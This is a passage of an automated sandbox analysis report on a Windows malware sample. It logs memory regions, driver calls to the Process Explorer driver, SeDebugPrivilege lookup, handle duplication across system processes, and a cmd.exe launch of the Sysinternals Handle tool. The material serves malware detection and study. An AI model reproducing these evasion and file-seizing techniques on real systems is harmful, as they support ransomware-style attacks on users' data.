| private_0x000000007feff000 | 0x7feff000 | 0x7fefffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| g13k6qzj64.exe | 0x140000000 | 0x140045fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x00007ff5ffed0000 | 0x7ff5ffed0000 | 0x7ff5fffcffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff5fffd0000 | 0x7ff5fffd0000 | 0x7ff5ffff2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff5ffff5000 | 0x7ff5ffff5000 | 0x7ff5ffff5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffb000 | 0x7ff5ffffb000 | 0x7ff5ffffcfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffd000 | 0x7ff5ffffd000 | 0x7ff5ffffefff | Private Memory | rw |
|
|
|
- |
| version.dll | 0x7ff8e3a50000 | 0x7ff8e3a59fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7ff8e6590000 | 0x7ff8e6639fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ff8eadd0000 | 0x7ff8eae19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ff8eae20000 | 0x7ff8eae2efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ff8eae30000 | 0x7ff8eae42fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x7ff8eb180000 | 0x7ff8eb7a7fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ff8eb7b0000 | 0x7ff8eb862fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x7ff8eba50000 | 0x7ff8ebb27fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ff8ebdc0000 | 0x7ff8ebf0dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ff8ec0c0000 | 0x7ff8ec21bfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ff8ec240000 | 0x7ff8ec29afff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ff8ec450000 | 0x7ff8ec575fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7ff8ec580000 | 0x7ff8edaa4fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ff8edbc0000 | 0x7ff8edd44fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ff8edd60000 | 0x7ff8edfdbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ff8edfe0000 | 0x7ff8ee030fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ff8ee0b0000 | 0x7ff8ee14cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ff8ee150000 | 0x7ff8ee185fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ff8ee190000 | 0x7ff8ee235fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | \\.\PROCEXP152 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
2 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 29 |
|
1 |
Registry (7)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals | value_name = EulaAccepted, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1 |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Process (111)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | c:\users\ciihmn~1\appdata\local\temp\g13k6qzj64.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_DUP_HANDLE |
|
3 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_DUP_HANDLE |
|
3 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_DUP_HANDLE |
|
2 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
2 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | System | desired_access = PROCESS_DUP_HANDLE |
|
5 | |
| Open | System | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\smss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\services.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\uni-likely-strap.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\turkey.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows mail\comfortable_welsh.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\msbuild\immediate.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla firefox\unlimited-victims.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows photo viewer\dishes neither nepal.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\tenant.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\momentum.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows nt\pharmaceutical photoshop.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows multimedia platform\song_biz_boats.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\tramadol_operates_statute.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\reference assemblies\batteries dirty.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows sidebar\mad.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\downloadedrack.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\reference assemblies\command.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\microsoft.net\abortionauditordirectors.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\romance.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\markets-represented-quarterly.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\common files\properly.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows portable devices\publisherfunnydownloaded.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\audiodg.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\ciihmnxmn6ps\desktop\cary.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\ciihmnxmn6ps\desktop\nwi6lhb5.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\usoclient.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cacls.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sc.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\takeown.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\schtasks.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 |
Module (68)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ff8ee2d0000 |
|
2 | |
| Get Handle | c:\windows\system32\ntdll.dll | base_address = 0x7ff8ee380000 |
|
15 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmn~1\appdata\local\temp\g13k6qzj64.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | address_out = 0x7ff8ee2f02a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x7ff8ee2f23f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x7ff8ee2e63c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x7ff8ee2ed920 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x7ff8ee2f5620 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventExW, address_out = 0x7ff8ee2f5580 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x7ff8ee2f55e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7ff8ee2f0e10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7ff8ee2ef110 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x7ff8ee3bcb10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7ff8ee3c5790 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7ff8ee3bea10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x7ff8ee2f28c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolWait, address_out = 0x7ff8ee3bc470 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7ff8ee3c5410 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x7ff8ee4142f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x7ff8ee3f95e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x7ff8ee413130 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7ff8ee2f0fb0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x7ff8ee312720 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7ff8eb92e7a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7ff8ee3128e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CompareStringEx, address_out = 0x7ff8ee2e6010 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetDateFormatEx, address_out = 0x7ff8ee312a00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7ff8ee2f0310 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTimeFormatEx, address_out = 0x7ff8ee312bc0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7ff8ee2f25d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidLocaleName, address_out = 0x7ff8ee312cd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x7ff8ee2e6000 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentPackageId, address_out = 0x7ff8eb8c45e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount64, address_out = 0x7ff8ee2e65a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsWow64Process, address_out = 0x7ff8ee2ee960 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryInformationProcess, address_out = 0x7ff8ee4136d0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryInformationThread, address_out = 0x7ff8ee413790 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySystemInformation, address_out = 0x7ff8ee4138a0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySymbolicLinkObject, address_out = 0x7ff8ee414980 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryDirectoryObject, address_out = 0x7ff8ee4147f0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtOpenSymbolicLinkObject, address_out = 0x7ff8ee4146c0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtOpenDirectoryObject, address_out = 0x7ff8ee413ac0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryObject, address_out = 0x7ff8ee413640 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySection, address_out = 0x7ff8ee413a50 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlInitAnsiString, address_out = 0x7ff8ee3e5d30 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlInitUnicodeString, address_out = 0x7ff8ee39f0d0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlAnsiStringToUnicodeString, address_out = 0x7ff8ee3a36a0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlFreeUnicodeString, address_out = 0x7ff8ee3a7110 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlFreeAnsiString, address_out = 0x7ff8ee3a7110 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlUnicodeStringToAnsiString, address_out = 0x7ff8ee3a3dc0 |
|
1 |
Driver (242)
| Operation | Driver | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Control | \\.\PROCEXP152 | control_code = 0x83350048 |
|
156 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335004c |
|
4 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335003c |
|
8 | |
| Control | \\.\PROCEXP152 | control_code = 0x83350014 |
|
5 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335000c |
|
68 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335000c |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (16)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | - |
|
7 | |
| Get Info | - |
|
1 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
6 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Get Info | type = Operating System |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #161: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #161 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c G13k6QZj.exe -accepteula "Workflow.Targets" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:55, Reason: Child Process |
| Unmonitor | End Time: 00:03:02, Reason: Self Terminated |
| Monitor Duration | 00:00:07 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcf4 |
| Parent PID | 0x858 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
250
0x
BCC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000630000 | 0x00630000 | 0x0064ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000630000 | 0x00630000 | 0x0063ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x00643fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000650000 | 0x00650000 | 0x00651fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000650000 | 0x00650000 | 0x00653fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000660000 | 0x00660000 | 0x00673fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000680000 | 0x00680000 | 0x006bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006c0000 | 0x006c0000 | 0x007bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007c0000 | 0x007c0000 | 0x007c3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007d0000 | 0x007d0000 | 0x007d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000007e0000 | 0x007e0000 | 0x007e1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000007f0000 | 0x007f0000 | 0x0082ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000870000 | 0x00870000 | 0x0087ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004980000 | 0x04980000 | 0x04b8ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04980000 | 0x04a3dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004a90000 | 0x04a90000 | 0x04b8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b90000 | 0x04b90000 | 0x04c8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c90000 | 0x04c90000 | 0x04d8ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04d90000 | 0x050c6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007eb70000 | 0x7eb70000 | 0x7ec6ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ec70000 | 0x7ec70000 | 0x7ec92fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ec95000 | 0x7ec95000 | 0x7ec95fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ec98000 | 0x7ec98000 | 0x7ec9afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ec9b000 | 0x7ec9b000 | 0x7ec9bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ec9d000 | 0x7ec9d000 | 0x7ec9ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
